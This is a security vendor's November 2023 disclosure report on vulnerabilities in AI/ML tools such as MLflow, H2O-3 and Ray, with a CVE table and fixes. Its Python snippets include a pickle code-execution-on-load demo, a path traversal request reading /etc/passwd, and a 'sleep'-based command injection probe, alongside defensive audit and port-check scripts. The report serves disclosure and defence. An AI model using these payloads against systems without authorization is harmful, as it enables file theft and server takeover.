
Protect AI's November 2023 Vulnerability Report

Written by Dan McInerney & Marcello Salvati | Nov 14, 2023 8:00:00 AM


The AI industry has a security problem, and it's not in the prompts you type into chatbots. At Protect AI we take a proactive approach to identifying and addressing security risks in AI systems, so we can provide the world with critical intelligence on vulnerabilities and how to fix them.

Protect AI's huntr is the world's first AI/ML bug bounty program. Our community of 13,000+ members hunts for impactful vulnerabilities across the entire AI/ML supply chain. Through our research and the huntr community, we've found that the tools used in the supply chain to build chatbots and other AI/ML models suffer from a wide range of vulnerabilities. Many of these OSS tools, frameworks, and artifacts come out of the box with vulnerabilities, such as unauthenticated remote code execution or local file inclusion, that can lead directly to complete system takeover. What does this mean for you? You are likely at risk of theft of models, data, and credentials. Below you will find a list of exploitable vulnerabilities discovered since we launched huntr in August of this year, all in tools with hundreds of thousands to millions of downloads a month.

It is important to note that all vulnerabilities were reported to the maintainers a minimum of 45 days prior to this publication, and that the fixed status reflects the situation at the time of publication. Our repo of vulnerability scanners and exploits can be found at https://github.com/protectai/ai-exploits, and our recommended actions are listed in the table below. If you need help mitigating these vulnerabilities in the meantime, please reach out at community@protectai.com; we're here to help.

This Month's Top Vulnerabilities

H2O-3 Local File Inclusion

Impact: Theft of credentials, models, and data

H2O-3 is a low-code machine learning service that stands up a web server through which users can upload data and have a model automatically trained on it. It inadvertently allowed unauthenticated remote users to execute arbitrary JavaScript, which could be used to read other users' data or files on the local system.

https://github.com/protectai/ai-exploits/tree/main/h2o
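A quick way to gauge exposure is to check whether an H2O-3 instance answers REST requests without credentials. The sketch below is a minimal illustration, assuming the default port 54321 and the standard /3/About build-info endpoint; the working proof-of-concept modules live in the repo linked above, and the target URL here is a placeholder.

```python
import requests  # third-party: pip install requests

# Placeholder target; replace with a host you own or are authorized to test.
H2O_URL = "http://127.0.0.1:54321"

# Assumption: a stock H2O-3 deployment with no authenticating proxy in front of it
# will serve build metadata from /3/About to anyone who can reach the port.
resp = requests.get(f"{H2O_URL}/3/About", timeout=5)
if resp.ok:
    print("[!] H2O-3 answered an unauthenticated request -- the issues described "
          "above are reachable by anyone who can hit this port.")
else:
    print(f"Server responded with HTTP {resp.status_code}")
```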

H2O-3 Remote Code Execution

Impact: Server takeover leading to foothold in network and theft of sensitive data

H2O-3 allowed users to upload Java models remotely through API calls. Attackers could embed malicious code in these models, which H2O-3 then executed, giving them access to the operating system. The result: theft of credentials, models, and data, as well as a foothold in the network from which to launch further attacks.

https://github.com/protectai/ai-exploits/tree/main/h2o
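The underlying issue is generic: any service that loads and runs a user-supplied model artifact is effectively running that user's code. H2O-3's case involved uploaded Java models, but the same class of risk is easy to demonstrate in Python with a pickle-based artifact, as in the hedged sketch below (illustrative only, not H2O-3's actual code path).

```python
import pickle

# Illustration of why executing uploaded model artifacts is dangerous.
# This mirrors the class of issue described above, not H2O-3's Java code path.
class MaliciousModel:
    def __reduce__(self):
        # Whatever is returned here runs as soon as the artifact is unpickled.
        import os
        return (os.system, ("echo 'code ran during model load'",))

artifact = pickle.dumps(MaliciousModel())

# A service that "just loads the model" has already executed attacker code:
pickle.loads(artifact)
```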

MLflow Local File Inclusion

Impact: Theft of credentials, models, and data

MLflow, a tool for storing and tracking models that includes a web server user interface, allowed unauthenticated remote users to read arbitrary local files on the system via the get-artifact API call. Key files such as SSH keys and cloud credentials were at risk.

https://github.com/protectai/ai-exploits/tree/main/mlflow
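A simple way to test whether a tracking server is affected is to request a file outside the artifact root through the artifact-download API and see whether its contents come back. The sketch below is a rough probe: the endpoint path, query parameter names, and run ID are assumptions/placeholders based on MLflow's get-artifact route, and the maintained exploit modules in the repo above should be treated as the authoritative reference.

```python
import requests  # third-party: pip install requests

# Placeholder target; replace with a server you own or are authorized to test.
MLFLOW_URL = "http://127.0.0.1:5000"

# Assumption: the tracking server exposes /get-artifact with a 'path' query
# parameter. A vulnerable build serves files outside the artifact root when
# given a traversal payload; a patched one should reject it.
payload = "../../../../etc/passwd"
resp = requests.get(f"{MLFLOW_URL}/get-artifact?path={payload}&run_uuid=0", timeout=5)

if resp.ok and "root:" in resp.text:
    print("[!] Server returned /etc/passwd -- local file inclusion appears exploitable")
else:
    print(f"No file disclosure observed (HTTP {resp.status_code})")
```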

MLflow Arbitrary File Write

Impact: Server takeover leading to foothold in network and theft of sensitive data

Due to how MLflow handles the protocols associated with its model storage location, an unauthenticated attacker can overwrite arbitrary files on the operating system. There are several ways to turn this into code execution, such as adding the attacker's own SSH key to the server's authorized_keys file to allow remote login.

https://github.com/protectai/ai-exploits/tree/main/mlflow
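Because the most direct escalation path is writing an attacker's public key into a user's authorized_keys file, one useful response while patching is to audit that file for entries you don't recognize. Below is a small, hedged sketch that lists the key type, SHA256 fingerprint, and comment of each entry on the local machine; adapt the path for the account your MLflow server runs under.

```python
import base64
import hashlib
import pathlib

# Audit ~/.ssh/authorized_keys for unexpected entries.
auth_keys = pathlib.Path.home() / ".ssh" / "authorized_keys"

if auth_keys.exists():
    for line in auth_keys.read_text().splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        # Entries may start with options; find the field that looks like a key type.
        for i, field in enumerate(parts):
            if field.startswith(("ssh-", "ecdsa-")) and i + 1 < len(parts):
                key_type, blob = field, parts[i + 1]
                comment = " ".join(parts[i + 2:]) or "<no comment>"
                # OpenSSH-style fingerprint: SHA256 of the decoded key blob, base64 without padding.
                digest = hashlib.sha256(base64.b64decode(blob)).digest()
                fingerprint = base64.b64encode(digest).decode().rstrip("=")
                print(f"{key_type}  SHA256:{fingerprint}  {comment}")
                break
else:
    print(f"{auth_keys} not found")
```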

Ray Remote Code Execution

Impact: Server takeover leading to foothold in network and theft of sensitive data

Ray is used for the distributed training of machine learning models. In its web interface, unauthenticated attackers could inject operating system commands into a URL parameter, which Ray then executed, leading to full system compromise.

https://github.com/protectai/ai-exploits/tree/main/ray
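Command injection in a URL parameter can usually be confirmed with a time-based payload: if a request that embeds a sleep takes measurably longer to return, the parameter value is reaching a shell. The sketch below is a generic probe of that pattern; the URL and parameter name are placeholders (the affected Ray dashboard route is the cpu_profile endpoint listed as CVE-2023-6019 in the table below, documented precisely in the repo above).

```python
import time
import requests  # third-party: pip install requests

def looks_injectable(url: str, param: str, delay: int = 5) -> bool:
    """Time-based check: compare a benign request with one that embeds a sleep."""
    benign = {param: "flamegraph"}                    # placeholder benign value
    payload = {param: f"flamegraph;sleep {delay}"}    # shell metacharacter plus sleep

    start = time.monotonic()
    requests.get(url, params=benign, timeout=delay * 3)
    baseline = time.monotonic() - start

    start = time.monotonic()
    requests.get(url, params=payload, timeout=delay * 3)
    delayed = time.monotonic() - start

    # If the payloaded request took roughly `delay` seconds longer, the
    # parameter is very likely being interpolated into a shell command.
    return delayed - baseline >= delay * 0.8

# Placeholder URL and parameter; only probe systems you are authorized to test.
print(looks_injectable("http://127.0.0.1:8265/worker/cpu_profile", "format"))
```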

 

| CVE | Title | Severity | CVSS | Fixed | Recommendations |
|---|---|---|---|---|---|
| CVE-2023-6021 | Ray Log File Local File Include | High | 7.5 | Y | Upgrade to the latest non-vulnerable version |
| CVE-2023-6020 | Ray Static File Local File Include | High | 7.5 | Y | Upgrade to the latest non-vulnerable version |
| CVE-2023-6019 | Ray Command Injection in cpu_profile parameter | Critical | 9.8 | Y | Upgrade to the latest non-vulnerable version |
| CVE-2023-6023 | ModelDB Local File Include | High | 8.6 | N | Restrict access to the web application |
| CVE-2023-6018 | MLflow Arbitrary File Write | Critical | 10 | N | Restrict access to the web application |
| CVE-2023-1177 | MLflow Local File Include via Model Versions API | Critical | 9.3 | Y | Upgrade to the latest non-vulnerable version |
| CVE-2023-1176 | MLflow Arbitrary File Enumeration | Medium | 5.9 | Y | Restrict access to the web application |
| CVE-2023-6014 | MLflow Authentication Bypass | Critical | 9.1 | Y | Upgrade to the latest non-vulnerable version |
| CVE-2023-6015 | MLflow Arbitrary File Upload | Critical | 10 | Y | Upgrade to the latest non-vulnerable version |
| CVE-2023-6016 | H2O Remote Code Execution via POJO Model Import | Critical | 10 | N | Restrict access to the application |
| CVE-2023-6038 | H2O Local File Include | Critical | 9.3 | N | Restrict access to the application |
| CVE-2023-6017 | H2O S3 Bucket Takeover | High | 8.7 | Y | Upgrade to the latest non-vulnerable version |
| CVE-2023-6013 | H2O Stored XSS/LFI | Critical | 9.3 | N | Restrict access to the application |
| CVE-2023-43804 | Urllib3 Cookie Header Leakage | Medium | 5.9 | Y | Upgrade to the latest non-vulnerable version |
| CVE-2023-6022 | Prefect Cross Site Request Forgery | High | 8.8 | N | Restrict access to the application |
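Several of the recommendations above amount to making sure these servers are not reachable from untrusted networks. A quick, hedged self-check is to probe the default ports of the affected tools on hosts you administer; the port numbers below are assumptions based on common out-of-the-box configurations, so adjust the host list and ports to match your deployment.

```python
import socket

# Default ports are assumptions based on common out-of-the-box configurations;
# extend or adjust for your own environment (e.g., ModelDB, custom ports).
SERVICES = {
    "MLflow tracking server": 5000,
    "H2O-3": 54321,
    "Ray dashboard": 8265,
    "Prefect UI/API": 4200,
}

def is_open(host: str, port: int, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# Placeholder host list; only scan machines you own or are authorized to assess.
hosts = ["10.0.0.5"]

for host in hosts:
    for name, port in SERVICES.items():
        if is_open(host, port):
            print(f"[!] {host}:{port} ({name}) is reachable -- "
                  "verify it is not exposed beyond trusted networks")
```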